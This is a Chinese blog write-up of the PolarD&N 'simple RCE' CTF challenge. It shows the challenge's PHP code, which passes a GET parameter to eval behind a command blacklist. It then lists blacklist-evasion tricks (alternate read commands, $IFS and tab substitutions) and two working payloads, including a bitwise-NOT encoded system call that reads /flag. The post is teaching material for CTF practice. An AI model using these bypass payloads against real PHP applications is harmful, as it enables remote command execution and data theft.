PolarD&N(简单rce)

最新推荐文章于 2024-04-02 20:14:04 发布
最新推荐文章于 2024-04-02 20:14:04 发布
阅读量503 收藏
点赞数
分类专栏: PolarD&N 文章标签: php 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46029520/article/details/130178780
版权

PolarD&N(简单rce)

一、网站地址:https://www.polarctf.com/

二、打开题目

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-i7IKevHK-1681605902192)(D:\网安笔记\图片\image-20230415190913908.png)]

三、代码分析

<?php
highlight_file(__FILE__);    //对文件进行语法高亮显示

function no($txt){			//定义一个no函数,并传入变量txt
    if(!preg_match("/cat|more|less|head|tac|tail|nl|od|vim|uniq|system|proc_open|shell_exec|popen| /i", $txt)){	                    //preg_match 函数用于执行一个正则表达式匹配
    return $txt;			//返回参数值
    }else{
		die("what's up");   //输出一条消息,并退出当前脚本
    }
}

$yyds=($_POST['yyds']);		//通过POST方式传递参数yyds
if(isset($_GET['sys'])&&$yyds=='666'){  //通过GET方式传递参数sys;并判断
  eval(no($_GET['sys']));			//调用no函数,并输出
  }else{
    echo "nonono";					//输出nonono		
	}
?>

四、绕过姿势

  • 命令执行函数

    system()
passthru()
exec()
shell_exec()
popen()/proc_open()

  • 读取文件命令

    more:一页一页的显示档案内容
less:与 more 类似
head:查看头几行
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示
tail:查看尾几行
nl:显示的时候,顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器,这个也可以查看
vim:一种编辑器,这个也可以查看
sort:可以查看
uniq:可以查看

  • 空格替代

    <,<>,${IFS},$IFS,%20(space),%09(tab),$IFS$9,$IFS$1

五、本题绕过

  • 方法一:使用未被过滤的命令

    sys=passthru('sort%09/flag');

  • 方法二:字符串转义绕过;适用PHP版本PHP>=7

    以八进制表示的\[0–7]{1,3}转义字符会自动适配byte(如"\400" == “\000”)
以十六进制的\x[0–9A-Fa-f]{1,2}转义字符表示法(如“\x41")
以Unicode表示的\u{[0–9A-Fa-f]+}字符,会输出为UTF-8字符串
URL编码协议规定(即 RFC3986 协议):URL 中只允许包含英文字母、数字、以及这 4 个 - _ . ~ 特殊字符和所有的保留字符

    sys=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);

  • 获得flag

在这里插入图片描述
在这里插入图片描述

果粒程1122
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
matlab开发-垂直风速方向
08-27
`polard2cart.m` 可能是转换函数,将极坐标(角度和半径)转换为笛卡尔坐标(x和y)。在处理风向数据时,这种转换可能很有用,因为它允许在直角坐标系统中进行进一步的计算和可视化。 `winddata.txt` 文件包含了...
polar CTF 简单rce
samRsa
01-03 616
polar CTF 简单rce 【代码】polar CTF 简单rce
PolarD&N-CTF-web方向-简单
J1ng_Hong的博客
12-06 2462
所以bp的方法就不行了。然后源码看了好久都没找到id=9的地方,并且我还尝试传入id这个参数。post传参一个yyds=666,这是不会被检测的。这就是说我们需要post一个名为xdmtql的变量,然后这个变量不能是数组。然后发现有一个index.php,然后发现根目录有一个flag的文件。然后发现了一个叫做/.index.php.swp的备份文件。这就说明,如果换行符应该是不会被检测的。虽然很多乱码,但是flag还是包含在里面的。要匹配 . ,请使用 \.。然后就得到了flag。然后就得到了flag。
PolarD&N_PWN_Choice
Kuluha的博客
10-14 187
当v4等于1时,选择Data1,当v4等于2时,选择Data2,如果v4不等用于1或2,则执行Data3.那么我们只要通过向scanf发送不等于1或2的数,就可以执行Data3。PS:怎么选择Data3呢,感觉在好多人眼里这是一个再简单不过的问题,但是在以前这个问题难倒了我好一阵,所以,我选择在这里开一个小讲堂帮助一下那些跟我一样不知道也不敢问的家人们,大家可以各取所需。在主函数中我们发现三个选项,分别为Data1/2/3,我们分别点开函数发现,三者中唯有Data3存在足够的溢出可以使我们进一步操作。
PolarD&N-CTF-web方向-中等
J1ng_Hong的博客
12-12 1527
(由于发现中等题里面有许多新的知识点,所以特意拉了一个新的博客来展示)
PHP是世界上最好的语言-PolarD&N XXF无参数RCE QUERY_STRING 特性
m0_64180167的博客
12-17 480
这个靶场我之前看到过打广告,而且感觉比较新 来坐坐这里还是。
PolarD&N靶场题解
qq_43423311的博客
03-23 2528
PolarD&N CTF靶场。
PolarD&N】刷题记录2
最新发布
青青很OK的博客
04-02 694
当通过POST方式传递name变量的值,会被存入到session中,会在/tmp目录下存储session的值。第二个file是文件包含,php文件会被执行,然后file那边过滤了base加密等方式。1.查看代码,提取精华:get请求让id=1,post请求jljcxy=flag。2.随便输入点东西,然后提交查询,发现没有东西。6.开始攻击,等待完成后按照长度排序,然后查看内容,获得flag。2.抓个包看看,发现了base32,解码发现是一个目录。1.查看页面,很经典的上传页面,上传个一句话木马看看。
基于Matlab绘制风向与风速的关系图.zip
02-08
3. **polard2cart.m**:这个函数可能是将极坐标(Polar Coordinates)转换为直角坐标(Cartesian Coordinates)的自定义实现。在处理风向数据时,风向通常以角度表示(极坐标),而风速则可能作为径向距离(也是极...
PolarD&N_CTF_WEB_反序列化
weixin_62626298的博客
10-13 164
在这个代码中,创建了一个example类,一个process类,example类中有一个变量$handle,一个魔法函数__destruct(),魔幻函数中调用了函数funnnn,然而根据funnnn中的函数显示,变量handle调用了prcocess类的方法,这说明handle变量是一个process类的实例对象。需要通过get方法输入的是一个data值,而且data值在传递进去之后,会先被反序列化一下,序列化只会保存对象的所有变量。1.必须让handle变量是一个process类的实例化对象。
polar CTF上传
samRsa
12-29 459
polar CTF 上传 经过上传测试发现,这题过滤掉了
ctfshow-web入门——命令执行(2)(web41-web57)
m0_62905745的博客
03-16 1008
本篇文章是ctfshow的web入门部分的命令执行部分wp(web41-web 57),包括一些题目解答,自己的笔记和总结,有错误还希望大家指正,一起学习进步!
CTFSHOW Web入门 44-52
m0_50936156的博客
01-22 430
目录web 44web 45web 46web 47web 48web 49web 50web 51web 52 web 44 if(!preg_match("/;|cat|flag/i", $c)) {system($c." >/dev/null 2>&1"); 这题过滤了cat,flag 关于cat的过滤绕过可以用以下命令来替换 cat file1 从第一个字节开始正向查看文件的内容 tac file1 从最后一行开始反向查看一个文件的内容 more file1 查看一个长文
SHCTF-WEB
m0_68113265的博客
10-05 69
第二个preg_match可以回溯次数超过一百万次绕过。先unicode解码接着base64解码得flag。第一个preg_match可以数组绕过num[]preg_replace函数/e下的任意代码执行。bp爆破出,账号amdin密码password。main.js中unicode代码。
CTFshow web(php命令执行 45-49)
csjjjd的博客
02-08 1254
这里 system($c." >/dev/null 2>&1");就是把内容写入黑洞的意思。||是可以进行命令分割的,意思是只会执行前面的命令,所以直接。这不还是那个payload。这里就是多把$给过滤了,
PHP-RCE绕过的姿势总结
有时候,想要一块二向箔
02-18 7845
一、命令执行空格过滤取反绕过命令分隔符黑名单绕过(比如flag字符)拼接二、代码执行总结参考文章 前言 做了很多的题目,静下心来学习大佬做点小总结 一、命令执行 空格过滤 < 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等 取反绕过 取反两次就可以得到想要绕过限制的数据 传参时 ?code=(~%8F%97%8F%96%91%99%90)(); 在做NSS平台上的一道rce题目就是用到类似的思路,
polar靶场通关笔记
weixin_43296565的博客
06-06 4967
这里是关于自己打polar靶场的小笔记
【CTFSHOW】web入门命令执行
7ruth0hn的博客
08-02 952
文章目录写在前面web43web44web45web46web47web48web49web50web51web52web53web53 写在前面 命令执行之前做了一部分,又搁了好久。今天继续补补。 web43 if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|cat/i", $c)){ system($c." >/dev/null 2>&1"); } payload: ?c=nl
[PolarD&N]题解——03ret2syscall_32
2301_80238613的博客
10-13 168
决定利用gets()函数的溢出,去构造execve("/bin/sh", 0, 0)。存在ebx,ecx,edx连续的寄存器,选取连续的即可。题目名称:03ret2syscall_32。题目来源:PolarD&N靶场(是一个32位静态的题目!如有错误欢迎大佬指正!
Polar_D&N[MISC]大礼包
m0_73720466的博客
10-15 103
因为flag格式是flag{},想到栅栏密码对其进行解密(https://www.qqxiuzi.cn/bianma/zhalanmima.php)1) 根据加密压缩包的注释得出密码是6位以上,用ARCHPR工具限定纯数字,7-8位爆破得到密码“9635421”在图片尾部得到一串base32,解码得到base64,再解码后得到明文sn{bvr1_0yytcyp_fp0}得到synt{cbyvpr_1f_p00y},再解一次凯撒密码(移位数是13)得到flag。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

果粒程1122

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值